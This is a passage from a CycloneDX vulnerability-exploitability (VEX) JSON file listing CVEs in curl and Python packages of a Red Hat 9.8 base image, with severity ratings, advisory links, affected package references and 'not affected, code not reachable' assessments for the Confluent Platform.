          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-15224",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        287
      ],
      "description": "When doing SSH-based transfers using either SCP or SFTP, and asked to do\npublic key authentication, curl would wrongly still ask and authenticate using\na locally running SSH agent.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15224"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/7"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15224"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15224.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15224.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-hccr-q52r-4w88"
        },
        {
          "url": "https://hackerone.com/reports/3480925"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15224"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15224"
        }
      ],
      "published": "2026-01-08T10:15:47+00:00",
      "updated": "2026-06-17T08:37:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-15282",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "User-controlled data URLs parsed by urllib.request.DataHandler allow injecting headers through newlines in the data URL mediatype.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15282"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15282"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19177.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/05356b1cc153108aaf27f3b72ce438af4aa218c0"
        },
        {
          "url": "https://github.com/python/cpython/commit/34d76b00dabde81a793bd06dd8ecb057838c4b38"
        },
        {
          "url": "https://github.com/python/cpython/commit/3f396ca9d7bbe2a50ea6b8c9b27c0082884d9f80"
        },
        {
          "url": "https://github.com/python/cpython/commit/4ed11d3cd288e6b90196a15c5a825a45d318fe47"
        },
        {
          "url": "https://github.com/python/cpython/commit/a35ca3be5842505dab74dc0b90b89cde0405017a"
        },
        {
          "url": "https://github.com/python/cpython/commit/f25509e78e8be6ea73c811ac2b8c928c28841b9f"
        },
        {
          "url": "https://github.com/python/cpython/issues/143925"
        },
        {
          "url": "https://github.com/python/cpython/pull/143926"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-15282.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/X66HL7SISGJT33J53OHXMZT4DFLMHVKF/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15282"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-3"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15282"
        }
      ],
      "published": "2026-01-20T22:15:50+00:00",
      "updated": "2026-06-17T08:37:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-1632",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
